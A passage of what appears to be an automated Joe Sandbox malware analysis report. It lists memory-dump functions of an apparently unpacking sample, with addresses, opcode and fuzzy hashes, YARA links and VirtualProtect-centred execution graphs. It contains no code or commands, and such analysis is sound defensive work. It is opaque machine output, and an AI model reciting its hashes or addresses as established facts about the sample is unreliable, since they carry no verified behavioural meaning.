                                                            • Instruction Fuzzy Hash: ABE0177190A7884FC74A9B3488A99803FB0EE6B21178B01C7D045CF5B3EA5D8D89C752
                                                            Function 00007FFD9BAF8079 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d31fa697f5e44a0111269a3430acab1cb1bcd2aacb62210cce70f3a499f91b1f
                                                            • Instruction ID: d32185705cd2da419cb85299d93dd1da11d3d7e2c48b8f2930a3cde888bebab2
                                                            • Opcode Fuzzy Hash: d31fa697f5e44a0111269a3430acab1cb1bcd2aacb62210cce70f3a499f91b1f
                                                            • Instruction Fuzzy Hash: AFE04F2154F3C04FC70B973088B88547F60DE2B21038A40EEC145CF2B3E5298D49C702
                                                            Function 00007FFD9BAFDC79 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3fa799343420fc2f7fb740c623fb9b4f5aab2b078573fd9b9dceea2072441a2
                                                            • Instruction ID: 65aec5663ad2742d356b1a54043c2dd432b3c2062ecb00ab5a9225a1fa98eef4
                                                            • Opcode Fuzzy Hash: d3fa799343420fc2f7fb740c623fb9b4f5aab2b078573fd9b9dceea2072441a2
                                                            • Instruction Fuzzy Hash: 6AE04F2154E3C44FC70B973088788503F609E2721078A41EEC145CF2B3E6298849C702
                                                            Function 00007FFD9BAC6A11 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction ID: 1e7ea4726f0590c06b16de3dc9349bf9a163589073d4b6c201e5a33f5b902515
                                                            • Opcode Fuzzy Hash: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction Fuzzy Hash: 51E01220F0901E4BFBB4B794C8607B962A1AF94300F1240B4D80D933E2DDB86F814749
                                                            Function 00007FFD9BAC5384 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction ID: ed0e61b198001209f818b04ed4d54ac883336c0034daeb39cc2ad2099b5da0ca
                                                            • Opcode Fuzzy Hash: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction Fuzzy Hash: 47E0EC24F0A80E8FEEA4FBA880786B822C29F54710F0A40B4E40DC72B2DDA8A9014704
                                                            Function 00007FFD9BAE5482 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bae3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89f6b807177e1225d16e7df19c848799da2258c7ea209a9a332e77e5e1de8161
                                                            • Instruction ID: 37edc7076fc4c2e28668e714698bc654a96485dc4b70f56e8cf4b7ad10628b33
                                                            • Opcode Fuzzy Hash: 89f6b807177e1225d16e7df19c848799da2258c7ea209a9a332e77e5e1de8161
                                                            • Instruction Fuzzy Hash: 23C0121275E81D0A7598B15C38521F883C2D7C813571513F3E00DC328ADC0A598302C4
                                                            Function 00007FFD9BAF20F0 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                            Function 00007FFD9BAFBDE0 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f89cb3f62b3182ca9adc3d9aed498fb5175fa03025083ebc1b10905a140eb21
                                                            • Instruction ID: fc53cdff608347623775037792c106689762831bf29b6ef07b9df21540533fd9
                                                            • Opcode Fuzzy Hash: 9f89cb3f62b3182ca9adc3d9aed498fb5175fa03025083ebc1b10905a140eb21
                                                            • Instruction Fuzzy Hash: 13D02230B509040FC70CA73888588703790EB6A202B8200A8D00AC72B1D9AADC89C741
                                                            Function 00007FFD9BAF75B8 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                            • Instruction ID: 93ada8c3559bb867e47995193bd0202fb733a6a8fa3329ca9ccae7e0f10ffa3a
                                                            • Opcode Fuzzy Hash: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                            • Instruction Fuzzy Hash: 9BD01234B519044FCB1CA7388859C747791EBAA216BD540A9D00AC73B1D96ADD89C741
                                                            Function 00007FFD9BAC0835 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e936795df280284fbe1680a90c07a03b5b2cd9b3a8fad33150715f2f2d6be2e3
                                                            • Instruction ID: 4129fd0d51a785f1061e2ea5148f07247befa67b87b118e53b1d9063a8df5a84
                                                            • Opcode Fuzzy Hash: e936795df280284fbe1680a90c07a03b5b2cd9b3a8fad33150715f2f2d6be2e3
                                                            • Instruction Fuzzy Hash: 93C01214B5740D51D03473AEEC664F97740AF48118F864171E40D85096DC491587C2DA
                                                            Function 00007FFD9BAC0B9D Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction ID: 050d8e8814590b799ee996d36945032e3fad8cecaae2ead40cbd6cb78caa5bea
                                                            • Opcode Fuzzy Hash: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction Fuzzy Hash: 2EC0123062A80E8FDA80BB28C889824BBA0FB0E201BDA00E0E00CC71A1D65A98908700
                                                            Function 00007FFD9BAC06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction ID: 2234e022e19ea5219197fb4616ed885ec4011342f418d6e6b18645ffdf65eab9
                                                            • Opcode Fuzzy Hash: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction Fuzzy Hash: 3FC08C00F0F40F40F83037EE14220BCB1005BC4A10FD30132D04C820E19CDE22C5418E
                                                            Function 00007FFD9BAC308E Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2382abb1d8bd13a368f4ec6879c0849fc741086f48c87de85cd1e1eef6468543
                                                            • Instruction ID: 1ddb80e099fe518b4f19929de4c47b9be299ca1b253c48f0a35bf6161c62484f
                                                            • Opcode Fuzzy Hash: 2382abb1d8bd13a368f4ec6879c0849fc741086f48c87de85cd1e1eef6468543
                                                            • Instruction Fuzzy Hash: 5CC01210F2AD0E0BEEF8B3B880392FC00C26F44B00F620034E00ED32E3DDAC2A404A84
                                                            Function 00007FFD9BAD7D6E Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc3f8e72630c80a729c6a5733f170a9b71b42a4221c4276c24c4315fbdda3be2
                                                            • Instruction ID: 209770f3f9a3f57c00c020382ae85afd256a65f6a4c24d2cb60b502e3045faf9
                                                            • Opcode Fuzzy Hash: cc3f8e72630c80a729c6a5733f170a9b71b42a4221c4276c24c4315fbdda3be2
                                                            • Instruction Fuzzy Hash: 24D0C930E09618CEEBA0DB64C851B68B7B2FF48310F5002F6C01DE22CACB356D819B40
                                                            Function 00007FFD9BAC34BF Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 718b1564b16caac23f9bfb190fb5655060b47aeae2b11378fdbc4b44aac16134
                                                            • Instruction ID: 8ddf7f94e45fc8c7d4c3fd6111a0a5cb673ed710da835738426777e9fa29f40f
                                                            • Opcode Fuzzy Hash: 718b1564b16caac23f9bfb190fb5655060b47aeae2b11378fdbc4b44aac16134
                                                            • Instruction Fuzzy Hash: F7C04C01F1CC2A07E65976184C2567E04535F54729FD501B4F41F873DFCD5D5D0206C6
                                                            Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction ID: b00b1116aa25af495023ca70037b5d0b26bb27b9196e46cda1e400c7530b80a8
                                                            • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction Fuzzy Hash: 92B01200D5F44F40E83433FB095217870405B44104FC20170D40CD119198CE12944286
                                                            Function 00007FFD9BAD2C40 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction ID: a84aa108b41ec2fe9044ace8939f3ab70d8be2d6593a8267f9aa5b5f908a2e05
                                                            • Opcode Fuzzy Hash: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction Fuzzy Hash: 9AA00204E9780E01D81832FB1E970A474505FA9154FC61960E80985196FCCE5BE90393
                                                            Function 00007FFD9BAFD5A0 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction ID: 2b18dceb9d33b39305405c3ad9930cbe0a3ac247b75680c48a129e04e1d765a3
                                                            • Opcode Fuzzy Hash: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction Fuzzy Hash: EBA00144E6692E01A91832BA4A965A53CA25A88295FC901A1A948881D7E88D52EA12A2
                                                            Function 00007FFD9BAC6A8C Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction ID: 08126a0ba31587a5188420524d8baa40e4e82ab567600cd11480db9608fdb9cf
                                                            • Opcode Fuzzy Hash: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction Fuzzy Hash: B8B09201F0E12B46F1B032D4052937902D00F70344F0B0438D80C872E2FDDCAE010149

                                                            Non-executed Functions

                                                            Function 00007FFD9BAC09B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 85c06e23354b5e73a81d95539ee200d0fde7fdbb8bb3cd475c1631cb099e5e18
                                                            • Instruction ID: 579273eef08cfa2f0780210e9b83f76135f4f5566ba582a9906b28aa7542d3a7
                                                            • Opcode Fuzzy Hash: 85c06e23354b5e73a81d95539ee200d0fde7fdbb8bb3cd475c1631cb099e5e18
                                                            • Instruction Fuzzy Hash: E4514C06B1A46A45E339B7FD78219FD6B449FA927FB0843B7F85D8E0C74C486085C2E9

                                                            Execution Graph

                                                            Execution Coverage:2.3%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:15
                                                            Total number of Limit Nodes:2
                                                            execution_graph 19750 7ffd9bab6a8c 19752 7ffd9bab28b2 19750->19752 19752->19750 19753 7ffd9bab0998 19752->19753 19753->19752 19754 7ffd9babac20 19753->19754 19755 7ffd9babac79 19754->19755 19757 7ffd9bab12b0 19754->19757 19755->19752 19758 7ffd9bab12b9 19757->19758 19759 7ffd9babaf08 19758->19759 19760 7ffd9babb265 VirtualProtect 19758->19760 19759->19755 19761 7ffd9babb29e 19760->19761 19761->19755 19762 7ffd9bab1171 19764 7ffd9bab1147 19762->19764 19763 7ffd9bab1168 19764->19762 19764->19763 19765 7ffd9babb265 VirtualProtect 19764->19765 19766 7ffd9babb29e 19765->19766

                                                            Executed Functions

                                                            Function 00007FFD9BAE1441 Relevance: .5, Instructions: 468COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eefa1714ed19fc8e41ac697ecba294a4e9015b75b31f8bdf3069bce70da2c00b
                                                            • Instruction ID: 8647378b7226693d855f7e0161536bc26d892e422f75ebb9409e4fd6b78ae9d9
                                                            • Opcode Fuzzy Hash: eefa1714ed19fc8e41ac697ecba294a4e9015b75b31f8bdf3069bce70da2c00b
                                                            • Instruction Fuzzy Hash: BDD19F31A2E79D0BE32D4B684C920B537D1EBA2305B1987BDD5DBC3097D96CA907C781
                                                            Function 00007FFD9BAE1475 Relevance: .3, Instructions: 322COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81cf5d02486bf2c325de91f55368aef9701c9ada1c809446d85b82adfc47a775
                                                            • Instruction ID: b26a18f3ac2168ff90affdcf9564d995837aa2a8328d2b774c06fec917316a4a
                                                            • Opcode Fuzzy Hash: 81cf5d02486bf2c325de91f55368aef9701c9ada1c809446d85b82adfc47a775
                                                            • Instruction Fuzzy Hash: EB81BF71F2D36E0BE32C4A6C4C9207233D5EBE6216B1A827DD9D7C3197DD68B9078281
                                                            Function 00007FFD9BAB12B0 Relevance: 2.0, APIs: 1, Instructions: 518COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ffd9bab12b0-7ffd9babadad 3 7ffd9babadf9-7ffd9babadfc 0->3 4 7ffd9babadaf-7ffd9babadf6 0->4 5 7ffd9babae6f-7ffd9babaed2 3->5 6 7ffd9babadfe-7ffd9babae25 3->6 4->3 17 7ffd9babaeda-7ffd9babaf06 call 7ffd9babaf2a 5->17 18 7ffd9babaed4 5->18 6->5 10 7ffd9babae27-7ffd9babae2a 6->10 12 7ffd9babae2c-7ffd9babae3f 10->12 13 7ffd9babae64-7ffd9babae6c 10->13 15 7ffd9babae43-7ffd9babae56 12->15 16 7ffd9babae41 12->16 13->5 15->15 19 7ffd9babae58-7ffd9babae60 15->19 16->15 22 7ffd9babaf08-7ffd9babaf0e 17->22 23 7ffd9babaf52 17->23 18->17 19->13 24 7ffd9babaf15-7ffd9babaf29 22->24 25 7ffd9babaf10 22->25 26 7ffd9babafcc-7ffd9babafed 23->26 27 7ffd9babaf54-7ffd9babaf58 23->27 25->24 30 7ffd9babb039-7ffd9babb042 26->30 31 7ffd9babafef-7ffd9babb038 26->31 28 7ffd9babaf63-7ffd9babaf74 27->28 29 7ffd9babaf5e call 7ffd9bab03d8 27->29 29->28 32 7ffd9babb09d-7ffd9babb104 30->32 33 7ffd9babb044-7ffd9babb053 30->33 31->30 44 7ffd9babb106 32->44 45 7ffd9babb10c-7ffd9babb138 call 7ffd9babb15c 32->45 33->32 34 7ffd9babb055-7ffd9babb058 33->34 36 7ffd9babb05a-7ffd9babb06d 34->36 37 7ffd9babb092-7ffd9babb09a 34->37 39 7ffd9babb06f 36->39 40 7ffd9babb071-7ffd9babb084 36->40 37->32 39->40 40->40 42 7ffd9babb086-7ffd9babb08e 40->42 42->37 44->45 48 7ffd9babb13a-7ffd9babb140 45->48 49 7ffd9babb184 45->49 50 7ffd9babb147-7ffd9babb15b 48->50 51 7ffd9babb142 48->51 52 7ffd9babb186-7ffd9babb1a6 call 7ffd9bab03d8 49->52 53 7ffd9babb1fe-7ffd9babb1ff 49->53 51->50 55 7ffd9babb249-7ffd9babb29c VirtualProtect 53->55 56 7ffd9babb201-7ffd9babb248 53->56 61 7ffd9babb29e 55->61 62 7ffd9babb2a4-7ffd9babb2cc 55->62 56->55 61->62
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 241be47043f3815376a9bf1ba960381c7fc596b0ebe22152b862b96c166b1138
                                                            • Instruction ID: af4c5cee42d62f1a8051b42122ca30f63647531a79044b700b9f9568156d8502
                                                            • Opcode Fuzzy Hash: 241be47043f3815376a9bf1ba960381c7fc596b0ebe22152b862b96c166b1138
                                                            • Instruction Fuzzy Hash: 3CF1C231A0CA4D8FDB58EF58D8567F977E1FB58311F00423AE85EC32A2DE75A9418B81
                                                            Function 00007FFD9BAE1F8F Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 101 7ffd9bae1f8f-7ffd9bae1fa1 102 7ffd9bae1fa3-7ffd9bae1fa9 101->102 103 7ffd9bae1fad-7ffd9bae1fbf 101->103 102->103 104 7ffd9bae1fc8-7ffd9bae1fe5 103->104 105 7ffd9bae1fc1 103->105 106 7ffd9bae2057-7ffd9bae207a 104->106 107 7ffd9bae1fe7-7ffd9bae1fee 104->107 105->104 109 7ffd9bae207e-7ffd9bae2083 106->109 107->106
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: c7abedaf9e3a9ac2dac9965d3564524b1db7c609463bce85bd224d01e299ae72
                                                            • Instruction ID: 05650d77d302e125d60991bd2f4231d6209848dfb974c71bea67d970cc615d68
                                                            • Opcode Fuzzy Hash: c7abedaf9e3a9ac2dac9965d3564524b1db7c609463bce85bd224d01e299ae72
                                                            • Instruction Fuzzy Hash: EB118F2054F3C19FCB1797348868995BFA0AF53211B0E42EED085CF0B3DA6C498AC712
                                                            Function 00007FFD9BAEA7C9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 113 7ffd9baea7c9-7ffd9baea7dd 114 7ffd9baea7df-7ffd9baea7fa 113->114 115 7ffd9baea7fe-7ffd9baea803 114->115
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: f77e6d2ff746f10fa1414abbaa420d56cb49ce6da28c47b6b74998c9750ec443
                                                            • Instruction ID: 9502711a7c9f5c6c4c38e1e96c19e98b53f04e68f19f8bacaf277370bbeec8b6
                                                            • Opcode Fuzzy Hash: f77e6d2ff746f10fa1414abbaa420d56cb49ce6da28c47b6b74998c9750ec443
                                                            • Instruction Fuzzy Hash: 1CE06D6160F7C44FDB1AAB3488698557FB0EF6721174A52EEC046CB1A3EA2D988AC701
                                                            Function 00007FFD9BAEA739 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 110 7ffd9baea739-7ffd9baea74d 111 7ffd9baea74f-7ffd9baea76a 110->111 112 7ffd9baea76e-7ffd9baea773 111->112
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 64ee354defa44c7d90daec83464dca948b5855bae3ad3d837b7d42d99da17fc9
                                                            • Instruction ID: 12218db9bae72262702e751bd275704c118f477b45bd0de58cdc9ddd2d0683a3
                                                            • Opcode Fuzzy Hash: 64ee354defa44c7d90daec83464dca948b5855bae3ad3d837b7d42d99da17fc9
                                                            • Instruction Fuzzy Hash: 2FF06D6160F7C44FDB1AAB348869855BFB0EF6720174A52EFC046CF1A3EA2D9889C711
